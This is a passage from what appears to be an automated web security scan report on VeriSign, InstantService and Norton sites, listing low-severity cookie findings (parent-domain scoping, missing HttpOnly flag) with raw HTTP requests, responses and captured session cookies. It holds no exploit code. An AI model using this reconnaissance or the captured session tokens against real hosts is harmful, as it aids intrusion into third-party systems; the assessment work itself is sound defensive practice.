GET /rcm/verisign/scripts/utility.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: Apache Set-Cookie: TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 8013 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var menuItemCurrentlyHasFocus=false;function MM_findObj(n,d){var p,i,x;if(!d){d=document;} if((p=n.indexOf("?"))>0&&parent.frames.length){d=parent.frames[n.substring(p+1)].document;n=n.substring(0,p)...[SNIP]...
9.74. https://trust-center.verisign.com/rcm/verisign/style/brand.css
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/style/brand.css
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/brand.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: Apache Set-Cookie: TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 7437 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css @import "vrsn.css"; #vrsn_standard_bar{background-color:#9B0033;clear:both;color:#FFFFFF;font-size:.8em;height:2em;text-align:center;width:100%;} #vrsn_standard_bar_footer{border-top:1px solid #EDEDEE...[SNIP]...
9.75. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/style/capture_payment.css
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/capture_payment.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: Apache Set-Cookie: TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 2075 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css /*import from capture_payment.css - Coakley 10_5_2010 */ .radio_button {width:180px;} .blurb {padding-left:5px;padding-bottom:10px;} #tax_exemption_section {margin-left:35px;} .content_line { position...[SNIP]...
9.76. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/style/minimal_form.css
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/minimal_form.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: Apache Set-Cookie: TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 3324 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #quick_signin_box {position:relative;top:0px;margin:0px;} .minimal-form-gray, .minimal-form-gray * {background-color:gray;} .minimal-form, .minimal-form-gray{border:solid 1px #5C554B;height:auto;t...[SNIP]...
9.77. https://trust-center.verisign.com/rcm/verisign/style/module.css
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/style/module.css
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/module.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: Apache Set-Cookie: TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 698 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #ratepointbox{background-color:#FFFFFF;border:1px solid #999999;margin-bottom:10px;padding:1px;width:196px;} #ratepointbox .header{background-image:url(../images/ratepoint_header_bg.gif);background-po...[SNIP]...
9.78. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/style/product_selector.css
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/product_selector.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: Apache Set-Cookie: TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 9496 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #comparison_chart_panel{position:absolute;right:20px;top:0;} #product_ssp_ev{background-image:url(../images/SSP_EV.jpg);background-position:top;background-repeat:no-repeat;float:left;margin-bottom:0;...[SNIP]...
9.79. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/style/vrsn.css
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/vrsn.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: Apache Set-Cookie: TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 30719 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css body{color:#000;font-family:arial, helvetica, sans-serif;font-size:12px;height:100%;margin:0} a:link,a:visited{color:#1446A8;text-decoration:underline} h3{margin:0 0 0.8em;padding:0 0 0 1em;width:98%}...[SNIP]...
9.80. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.ch
Path: /assets/shared/images/sm_004276_oo.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=85AC46EBE3E5BE40; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.ch
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /assets/shared/images/sm_004276_oo.gif HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:47 GMT Server: Apache Set-Cookie: v1st=85AC46EBE3E5BE40; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.ch Last-Modified: Wed, 19 Jan 2011 20:21:22 GMT ETag: "2e58332-255-49a38c2aff480" Accept-Ranges: bytes Content-Length: 597 X-UA-Compatible: IE=EmulateIE7 Content-Type: image/gif GIF89a...[SNIP]...
9.81. http://www.verisign.co.uk/hp07/i/vlogo.gif
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.co.uk
Path: /hp07/i/vlogo.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=3A369731F9FF1259; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hp07/i/vlogo.gif HTTP/1.1 Host: www.verisign.co.uk Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:05 GMT Server: Apache Set-Cookie: v1st=3A369731F9FF1259; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk Last-Modified: Mon, 04 Apr 2011 20:53:46 GMT ETag: "29480d7-13e4-4a01df4a82a80" Accept-Ranges: bytes Content-Length: 5092 Content-Type: image/gif GIF89a...[SNIP]...
9.82. https://www.verisign.com/assets/visual-sciences/vip/zig.js
Summary
Severity: Information
Confidence: Certain
Host: https://www.verisign.com
Path: /assets/visual-sciences/vip/zig.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /assets/visual-sciences/vip/zig.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: https://idprotect.verisign.com/toolbar/activate.v Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.verisign.com Connection: Keep-Alive Cache-Control: no-cache
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:47:55 GMT Server: Apache Set-Cookie: v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com Last-Modified: Wed, 19 Jan 2011 20:34:24 GMT Accept-Ranges: bytes Content-Length: 2602 Expires: Sun, 09 Oct 2011 21:47:55 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-javascript //REFERENCE PAGE TAG var ct = "<img src="; var cd = "//www.verisign.com"; //this should contain the domain of the web site var cu = "/assets/visual-sciences/vip/zag.gif?Log=1"; //this should contai...[SNIP]...
10. Cookie without HttpOnly flag set
There are 118 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive. You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
10.1. https://admin.instantservice.com/Customer
Summary
Severity: Low
Confidence: Firm
Host: https://admin.instantservice.com
Path: /Customer
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Customer HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:36:51 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices Location: https://admin.instantservice.com/customerclient_error.html?null Content-Length: 0 P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8
10.2. https://admin.instantservice.com/links/5851/14753
Summary
Severity: Low
Confidence: Firm
Host: https://admin.instantservice.com
Path: /links/5851/14753
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/5851/14753 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:49 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 5905 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>VRSN Sales U...[SNIP]...
10.3. https://admin.instantservice.com/links/5851/16144
Summary
Severity: Low
Confidence: Firm
Host: https://admin.instantservice.com
Path: /links/5851/16144
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/5851/16144 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:50 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 5858 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>VRSN Sales A...[SNIP]...
10.4. https://admin.instantservice.com/links/5851/16145
Summary
Severity: Low
Confidence: Firm
Host: https://admin.instantservice.com
Path: /links/5851/16145
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/5851/16145 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:50 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 5853 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>VRSN Sales A...[SNIP]...
10.5. https://admin.instantservice.com/links/5851/39897
Summary
Severity: Low
Confidence: Firm
Host: https://admin.instantservice.com
Path: /links/5851/39897
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/5851/39897 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:50 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 5946 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>VRSN Sales U...[SNIP]...
10.6. http://buy.norton.com/
Summary
Severity: Low
Confidence: Firm
Host: http://buy.norton.com
Path: /
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?wicket:interface=:0:hf_pnl_mf_nprd_HeaderTopPanel_0:countryDropdown:globalStores:0:globalStore::ILinkListener:: HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:25 GMT Location: http://buy.norton.com/redirector/estore?COUNTRY=AR&VENDORID=Symantec_symEpVendor&LANGUAGE=ES&CURRENCY=ARS&PROMOID= Set-Cookie: symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 455 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/redirector/e...[SNIP]...
10.7. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/
Summary
Severity: Low
Confidence: Firm
Host: http://buy.norton.com
Path: /estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
